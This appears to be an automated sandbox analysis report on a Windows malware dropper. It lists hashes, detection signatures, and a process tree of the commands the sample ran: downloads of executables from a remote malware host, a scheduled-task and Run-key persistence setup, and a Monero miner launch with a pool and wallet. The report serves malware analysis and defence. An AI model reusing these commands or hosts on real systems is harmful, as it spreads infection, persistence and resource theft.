Analysis
-
max time kernel
152s -
max time network
153s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09/01/2022, 23:56
Static task
static1
General
-
Target
c39b6247c3d38b4e06f05db01e440bd72cc99b2c000c2d082b22b87a64e2cc8e.exe
-
Size
349KB
-
MD5
bdb742be28cdd944d6d76e7f848f5a8d
-
SHA1
81ed39584d00f6983f6332d0404bb8e8c0d7ea4b
-
SHA256
c39b6247c3d38b4e06f05db01e440bd72cc99b2c000c2d082b22b87a64e2cc8e
-
SHA512
e96c9e5fe7cf463ee29f49cd3ab24b5fc0eff8390f745f7e701451b72e0487d319c7c6ec636823cabc29b677406ed9b2445c7c4a8ffe2bfb9409b0bee3307bdf
Malware Config
Signatures
-
LoaderBot executable 3 IoCs
resource yara_rule behavioral1/memory/3996-156-0x0000000000210000-0x000000000066B000-memory.dmp loaderbot behavioral1/memory/3996-160-0x0000000000210000-0x000000000066B000-memory.dmp loaderbot behavioral1/memory/3996-161-0x0000000000210000-0x000000000066B000-memory.dmp loaderbot -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 760 WScript.exe -
Downloads MZ/PE file
-
Executes dropped EXE 15 IoCs
pid Process 4112 extd.exe 4080 extd.exe 1912 setup1.exe 4244 extd.exe 4412 setup2.exe 4424 extd.exe 3996 setup3.exe 2492 extd.exe 4836 update.exe 1984 1427_1641742560_826.exe 4844 6592_1641742763_483.exe 664 Driver.exe 1076 Driver.exe 4164 services32.exe 4036 sihost32.exe -
resource yara_rule behavioral1/files/0x000500000001ab2f-119.dat upx behavioral1/files/0x000500000001ab2f-118.dat upx behavioral1/files/0x000500000001ab2f-124.dat upx behavioral1/files/0x000500000001ab2f-129.dat upx behavioral1/files/0x000500000001ab2f-139.dat upx behavioral1/files/0x000500000001ab2f-164.dat upx -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url setup3.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" setup2.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup3.exe" setup3.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 39 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 4412 setup2.exe 3996 setup3.exe 1984 1427_1641742560_826.exe 1984 1427_1641742560_826.exe 1984 1427_1641742560_826.exe 4164 services32.exe 4164 services32.exe 4164 services32.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1912 set thread context of 792 1912 setup1.exe 80 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 3148 4836 WerFault.exe 82 4504 1076 WerFault.exe 90 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2080 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings cmd.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 9 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4412 setup2.exe 4412 setup2.exe 3996 setup3.exe 3996 setup3.exe 792 RegAsm.exe 3148 WerFault.exe 3148 WerFault.exe 3148 WerFault.exe 3148 WerFault.exe 3148 WerFault.exe 3148 WerFault.exe 3148 WerFault.exe 3148 WerFault.exe 3148 WerFault.exe 3148 WerFault.exe 3148 WerFault.exe 3148 WerFault.exe 3148 WerFault.exe 3148 WerFault.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 4504 WerFault.exe 4504 WerFault.exe 4504 WerFault.exe 4504 WerFault.exe 4504 WerFault.exe 4504 WerFault.exe 4504 WerFault.exe 4504 WerFault.exe 4504 WerFault.exe 4504 WerFault.exe 4504 WerFault.exe 4504 WerFault.exe 4504 WerFault.exe 4504 WerFault.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe 3996 setup3.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4412 setup2.exe Token: SeDebugPrivilege 3996 setup3.exe Token: SeDebugPrivilege 792 RegAsm.exe Token: SeDebugPrivilege 4836 update.exe Token: SeRestorePrivilege 3148 WerFault.exe Token: SeBackupPrivilege 3148 WerFault.exe Token: SeDebugPrivilege 3148 WerFault.exe Token: SeDebugPrivilege 4844 6592_1641742763_483.exe Token: SeLockMemoryPrivilege 664 Driver.exe Token: SeLockMemoryPrivilege 664 Driver.exe Token: SeDebugPrivilege 4504 WerFault.exe Token: SeDebugPrivilege 2452 conhost.exe Token: SeDebugPrivilege 1844 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1628 wrote to memory of 3720 1628 c39b6247c3d38b4e06f05db01e440bd72cc99b2c000c2d082b22b87a64e2cc8e.exe 69 PID 1628 wrote to memory of 3720 1628 c39b6247c3d38b4e06f05db01e440bd72cc99b2c000c2d082b22b87a64e2cc8e.exe 69 PID 3720 wrote to memory of 4112 3720 cmd.exe 70 PID 3720 wrote to memory of 4112 3720 cmd.exe 70 PID 3720 wrote to memory of 4112 3720 cmd.exe 70 PID 3720 wrote to memory of 760 3720 cmd.exe 71 PID 3720 wrote to memory of 760 3720 cmd.exe 71 PID 3720 wrote to memory of 4080 3720 cmd.exe 72 PID 3720 wrote to memory of 4080 3720 cmd.exe 72 PID 3720 wrote to memory of 4080 3720 cmd.exe 72 PID 3720 wrote to memory of 1912 3720 cmd.exe 74 PID 3720 wrote to memory of 1912 3720 cmd.exe 74 PID 3720 wrote to memory of 1912 3720 cmd.exe 74 PID 3720 wrote to memory of 4244 3720 cmd.exe 75 PID 3720 wrote to memory of 4244 3720 cmd.exe 75 PID 3720 wrote to memory of 4244 3720 cmd.exe 75 PID 3720 wrote to memory of 4412 3720 cmd.exe 76 PID 3720 wrote to memory of 4412 3720 cmd.exe 76 PID 3720 wrote to memory of 4412 3720 cmd.exe 76 PID 3720 wrote to memory of 4424 3720 cmd.exe 77 PID 3720 wrote to memory of 4424 3720 cmd.exe 77 PID 3720 wrote to memory of 4424 3720 cmd.exe 77 PID 3720 wrote to memory of 3996 3720 cmd.exe 78 PID 3720 wrote to memory of 3996 3720 cmd.exe 78 PID 3720 wrote to memory of 3996 3720 cmd.exe 78 PID 3720 wrote to memory of 2492 3720 cmd.exe 79 PID 3720 wrote to memory of 2492 3720 cmd.exe 79 PID 3720 wrote to memory of 2492 3720 cmd.exe 79 PID 1912 wrote to memory of 792 1912 setup1.exe 80 PID 1912 wrote to memory of 792 1912 setup1.exe 80 PID 1912 wrote to memory of 792 1912 setup1.exe 80 PID 1912 wrote to memory of 792 1912 setup1.exe 80 PID 1912 wrote to memory of 792 1912 setup1.exe 80 PID 1912 wrote to memory of 792 1912 setup1.exe 80 PID 1912 wrote to memory of 792 1912 setup1.exe 80 PID 1912 wrote to memory of 792 1912 setup1.exe 80 PID 792 wrote to memory of 4836 792 RegAsm.exe 82 PID 792 wrote to memory of 4836 792 RegAsm.exe 82 PID 792 wrote to memory of 4836 792 RegAsm.exe 82 PID 4836 wrote to memory of 1984 4836 update.exe 83 PID 4836 wrote to memory of 1984 4836 update.exe 83 PID 4836 wrote to memory of 4844 4836 update.exe 84 PID 4836 wrote to memory of 4844 4836 update.exe 84 PID 4836 wrote to memory of 4844 4836 update.exe 84 PID 3996 wrote to memory of 664 3996 setup3.exe 88 PID 3996 wrote to memory of 664 3996 setup3.exe 88 PID 3996 wrote to memory of 1076 3996 setup3.exe 90 PID 3996 wrote to memory of 1076 3996 setup3.exe 90 PID 1984 wrote to memory of 2452 1984 1427_1641742560_826.exe 93 PID 1984 wrote to memory of 2452 1984 1427_1641742560_826.exe 93 PID 1984 wrote to memory of 2452 1984 1427_1641742560_826.exe 93 PID 2452 wrote to memory of 1992 2452 conhost.exe 94 PID 2452 wrote to memory of 1992 2452 conhost.exe 94 PID 1992 wrote to memory of 2080 1992 cmd.exe 96 PID 1992 wrote to memory of 2080 1992 cmd.exe 96 PID 2452 wrote to memory of 2236 2452 conhost.exe 97 PID 2452 wrote to memory of 2236 2452 conhost.exe 97 PID 2236 wrote to memory of 4164 2236 cmd.exe 99 PID 2236 wrote to memory of 4164 2236 cmd.exe 99 PID 4164 wrote to memory of 1844 4164 services32.exe 100 PID 4164 wrote to memory of 1844 4164 services32.exe 100 PID 4164 wrote to memory of 1844 4164 services32.exe 100 PID 1844 wrote to memory of 4036 1844 conhost.exe 101 PID 1844 wrote to memory of 4036 1844 conhost.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\c39b6247c3d38b4e06f05db01e440bd72cc99b2c000c2d082b22b87a64e2cc8e.exe"C:\Users\Admin\AppData\Local\Temp\c39b6247c3d38b4e06f05db01e440bd72cc99b2c000c2d082b22b87a64e2cc8e.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\A7AD.bat C:\Users\Admin\AppData\Local\Temp\c39b6247c3d38b4e06f05db01e440bd72cc99b2c000c2d082b22b87a64e2cc8e.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:4112
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\29442\123.vbs"3⤵
- Blocklisted process makes network request
PID:760
-
-
C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exe "/download" "http://a0617224.xsph.ru/SIrrWmclYBgYamm.exe" "setup1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:4080
-
-
C:\Users\Admin\AppData\Local\Temp\29442\setup1.exesetup1.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Users\Admin\AppData\Local\Temp\update.exe"C:\Users\Admin\AppData\Local\Temp\update.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\ProgramData\1427_1641742560_826.exe"C:\ProgramData\1427_1641742560_826.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\ProgramData\1427_1641742560_826.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\services32.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\services32.exe"9⤵
- Creates scheduled task(s)
PID:2080
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services32.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Users\Admin\AppData\Roaming\services32.exeC:\Users\Admin\AppData\Roaming\services32.exe9⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:4164 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services32.exe"10⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"11⤵
- Executes dropped EXE
PID:4036 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost32"12⤵PID:588
-
-
-
-
-
-
-
-
C:\ProgramData\6592_1641742763_483.exe"C:\ProgramData\6592_1641742763_483.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 17366⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3148
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exe "/download" "http://a0617224.xsph.ru/c_setup.exe" "setup2.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:4244
-
-
C:\Users\Admin\AppData\Local\Temp\29442\setup2.exesetup2.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exe "/download" "http://a0617224.xsph.ru/RMR.exe" "setup3.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:4424
-
-
C:\Users\Admin\AppData\Local\Temp\29442\setup3.exesetup3.exe3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1076 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1076 -s 4365⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:2492
-
-